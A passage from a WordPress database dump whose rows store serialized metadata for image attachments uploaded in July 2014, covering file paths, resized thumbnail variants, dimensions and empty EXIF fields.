\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"i51-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"i51-1-880x483.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:483;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"i51-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"i51-1-450x247.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:247;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"i51-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1077,1954,'_wp_attached_file','2014/07/i61-1.jpg'),(1078,1954,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:618;s:4:\"file\";s:17:\"2014/07/i61-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"i61-1-300x185.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:185;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"i61-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"i61-1-768x475.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:475;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"i61-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:18:\"i61-1-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"i61-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"i61-1-880x544.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:544;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"i61-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"i61-1-450x278.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"i61-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1079,1955,'_wp_attached_file','2014/07/slide13-1.jpg'),(1080,1955,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1180;s:4:\"file\";s:21:\"2014/07/slide13-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide13-1-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide13-1-1024x629.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:629;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide13-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide13-1-768x472.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide13-1-1536x944.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:944;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide13-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:23:\"slide13-1-1670x1026.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1026;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide13-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide13-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide13-1-880x541.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide13-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide13-1-450x277.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide13-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1081,1956,'_wp_attached_file','2014/07/slide21-1.jpg'),(1082,1956,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:21:\"2014/07/slide21-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide21-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide21-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide21-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide21-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide21-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide21-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slide21-1-1670x939.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:939;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide21-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide21-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide21-1-880x495.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide21-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide21-1-450x253.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:253;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide21-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1083,1957,'_wp_attached_file','2014/07/slide31-1.jpg'),(1084,1957,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:21:\"2014/07/slide31-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide31-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide31-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide31-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide31-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide31-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide31-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slide31-1-1670x939.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:939;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide31-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide31-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide31-1-880x495.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide31-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide31-1-450x253.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:253;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide31-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1085,1958,'_wp_attached_file','2014/07/slide41-1.jpg'),(1086,1958,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1083;s:4:\"file\";s:21:\"2014/07/slide41-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide41-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide41-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide41-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide41-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide41-1-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide41-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slide41-1-1670x942.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:942;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide41-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide41-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide41-1-880x496.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide41-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide41-1-450x254.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:254;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide41-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1087,1959,'_wp_attached_file','2014/07/slide51-1.jpg'),(1088,1959,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1162;s:4:\"file\";s:21:\"2014/07/slide51-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide51-1-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide51-1-1024x620.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide51-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide51-1-768x465.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide51-1-1536x930.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:930;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide51-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:23:\"slide51-1-1670x1011.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1011;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide51-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide51-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide51-1-880x533.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide51-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide51-1-450x272.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide51-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1089,1960,'_wp_attached_file','2014/07/slide61-1.jpg'),(1090,1960,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1162;s:4:\"file\";s:21:\"2014/07/slide61-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide61-1-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide61-1-1024x620.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide61-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide61-1-768x465.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide61-1-1536x930.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:930;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide61-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:23:\"slide61-1-1670x1011.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1011;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide61-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide61-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide61-1-880x533.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide61-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide61-1-450x272.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide61-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1091,1961,'_wp_attached_file','2014/07/slide71-1.jpg'),(1092,1961,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:21:\"2014/07/slide71-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide71-1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide71-1-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide71-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide71-1-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide71-1-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide71-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slide71-1-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide71-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide71-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide71-1-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide71-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide71-1-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide71-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1093,1962,'_wp_attached_file','2014/07/slide81-1.jpg'),(1094,1962,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:21:\"2014/07/slide81-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide81-1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide81-1-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide81-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide81-1-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide81-1-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide81-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slide81-1-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-t